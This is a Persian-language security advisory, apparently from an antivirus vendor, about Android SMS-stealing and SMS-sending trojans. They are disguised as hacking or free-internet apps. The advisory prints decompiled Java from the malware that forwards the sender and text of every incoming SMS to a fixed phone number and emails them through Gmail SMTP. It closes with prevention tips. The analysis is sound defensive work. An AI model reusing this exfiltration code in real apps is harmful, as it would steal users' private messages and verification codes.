شرح کلی
نوع: تروجان (Trojan)
درجه تخریب: متوسط
میزان شیوع: متوسط
اسامی بدافزار
• Padvish) Trojan.Android.SmsSpy.ApkeditorsIrhack)
• Padvish) Trojan.Android.SmsSend.ApkeditorsIrhack)
• Kaspersky) HEUR:Trojan-SMS.AndroidOS.Agent.abr)
• BitDefenderFalx) Android.Trojan.SMSSend.AQT)
• ESET-NOD32) A Variant Of Android/TrojanSMS.Agent.BZW)
• DrWeb) Android.SmsSend.28203)
• Avira) ANDROID/TrojanSMS.IBAV.Gen)
تروجان(Trojan) چیست؟
تروجانها نوعی از بدافزار محسوب میشوند که خود را در قالب یک نرمافزار سالم و قانونی نشان میدهند و بسیار شبیه نرمافزارهای مفید و کاربردی رفتار میکنند. اما هنگامی که اجرا میشوند، خرابیهای زیادی را برای سیستم ایجاد میکنند. نرمافزارهای دانلود شده از اینترنت، جاسازی شدن در متن HTML، ضمیمه شدن به یک ایمیل و … از جمله راههای ورود تروجانها به سیستم هستند. تروجانها برخلاف ویروسها و کرمهای کامپیوتری قادر به تکثیر خود نیستند.
خانواده بدافزاری SmsSend/SmsSpy چیست؟
تعداد زیادی اپلیکیشن ایرانی آلوده با نام خانواده بدافزاری سارق پیامک یا ارسال پیامک، در مارکتهای مختلف اندرویدی، سایتهای غیر معتبر، کانالهای تلگرامی و یا لینکهای آلوده ارسالی از طریق اس ام اس وجود دارند. دستهای از آنها با هدف دستیابی به پیامکهای دریافتی کاربر و ارسال آنها به شمارهای مشخص و ایمیل مهاجم میباشند که همگی با نام پکیج “COM.APKEDITORS.IRHACK.APPS” شناخته میشوند.
دسته ای دیگر نیز با هدف ارسال پیامک به شماره مشخص شده توسط مهاجم به محض اجرای برنامه میباشند. نام پکیج آنها “AMOOGRAM.VAHID.MAIL” است. این برنامهها با نامهای مختلفی مانند هک تلگرام، ریکاوری رمز اینستاگرام، هک وای فای رایگان، عضو گیر گروه و کانال، شارژ گوشی رایگان، اینترت رایگان، اتصال سرور، مایکت و … به کاربر عرضه میشوند.
توضیحات فنی
- در مورد دسته بدافزارهای آلوده (سارق پیامک) با نام پکیج APKEDITORS.IRHACK.APPS:
برنامه آلوده مورد بررسی با نام “Telegram Hacker” میباشد. برنامه بلافاصله بعد از اجرا، ابتدا پیغامی به کاربر نشان میدهد مبنی بر “در حال اجرا” بودن برنامه، که پس از پر شدن Progress bar، از برنامه خارج شده و سه پیغام زیر به ترتیب به کاربر نمایش داده میشود:
1.”This app does not match your device, your Android is not compatible”
2. “برنامه حذف شد”
3. “@irhack_apps”
بلافاصله پس از نمایش پیغامها به کاربر، از برنامه خارج شده و آیکون برنامه Hidden میشود ولی در پس زمینه در حال انجام عملیات مخرب میباشد.
IncomingSms
زمانی که پیغام دریافت پیامک از طریق اندروید ارسال میشود، برنامه با توجه به مجوز دسترسی “android.permission.RECEIVE_SMS” که در زمان نصب برنامه از کاربر دریافت کرده، میتواند به پیامکهای دریافتی کاربر دسترسی داشته باشد. مشخصاتی چون (شماره تماس ارسال کننده پیام و متن پیام) را از پیامکهای دریافتی واکشی میکند و آنها را در قالب یک رشته به شماره تماس مشخص شده با استفاده از مجوز دسترسی “android.permission.SEND_SMS” ارسال میکند.
paramContext = (Object[])paramContext.get("pdus");
int i = 0;
for (;;)
{
if (i >= paramContext.length) {
return;
}
paramIntent = SmsMessage.createFromPdu((byte[])paramContext[i]);
this.phoneNumber = paramIntent.getDisplayOriginatingAddress();
this.messagex = paramIntent.getDisplayMessageBody();
Log.i("SmsReceiver", new StringBuffer().append(new StringBuffer().append("senderNum:").append(this.phoneNumber).toString()).append("; message: ").toString()+this.messagex);
try
{
SmsManager.getDefault().sendTextMessage("09123456789", (String)null, new StringBuffer().append(this.phoneNumber).append(":/n/n").toString() + this.messagex, (PendingIntent)null, (PendingIntent)null);
همچنین، مهاجم با هدف ارسال این اطلاعات به ایمیل خود از پروتکل SMTP استفاده میکند. ابتدا وضعیت اینترنت گوشی کاربر را بررسی میکند و در نهایت دادههای جمع آوری شده از پیامکهای کاربر را به آدرس خود ایمیل میکند.
paramIntent.put("mail.smtp.host", "smtp.gmail.com");
paramIntent.put("mail.smtp.socketFactory.port", "465");
paramIntent.put("mail.smtp.socketFactory.class", "javax.net.ssl.SSLSocketFactory");
paramIntent.put("mail.smtp.auth", "true");
paramIntent.put("mail.smtp.port", "465");
this.session = Session.getDefaultInstance(paramIntent, new Authenticator()
{
protected PasswordAuthentication getPasswordAuthentication()
{
return new PasswordAuthentication("Sender@gmail.com", "Password");
}
});
new RetriveFeedTask().execute(new String[0]);
i += 1;
}
@Override
protected String doInBackground(String... paramVarArgs)
{
try
{
paramVarArgs = new MimeMessage(IncomingSms.this.session);
paramVarArgs.setFrom(new InternetAddress("rec@gmail.com"));
paramVarArgs.setRecipients(Message.RecipientType.TO, InternetAddress.parse("Rec@gmail.com"));
paramVarArgs.setSubject(IncomingSms.this.phoneNumber);
paramVarArgs.setContent(IncomingSms.this.messagex, "text/html; Charset=utf-8");
Transport.send(paramVarArgs);
- در مورد دسته بدافزارهای آلوده (ارسال پیامک) با نام پکیج AMOOGRAM.VAHID.MAIL:
هدف این گروه از بدافزارها، ارسال پیامک با متن “هک شد” به شماره تلفن مشخص شده توسط مهاجم میباشد. نام یکی از این برنامهها “اینترنت رایگان” میباشد.
روش مقابله و پاکسازی سیستم
برای اطمینان خاطر از عدم آلودگی دستگاه، فایل پایگاه داده آنتیویروس پادویش را نصب و بهروز نگه دارید و اسکن آنتی ویروس را انجام دهید.
روش های پیشگیری از آلوده شدن گوشی:
1. از دانلود و نصب برنامه از منابع و مارکتهای موبایلی نامعتبر خودداری کنید.
2. هنگام نصب برنامههای موبایلی، به مجوزهای درخواستی دقت کنید.
3. از فایلها و اطلاعات ذخیره شده در گوشی، پشتیبانگیری مداوم انجام دهید.
4. از نسخههای غیررسمی برنامهها استفاده نکنید. برنامههایی مانند تلگرام و اینستاگرام نسخههای غیررسمی زیادی دارند و بیشتر آنها از طریق کانالهای تلگرامی انتشار مییابند.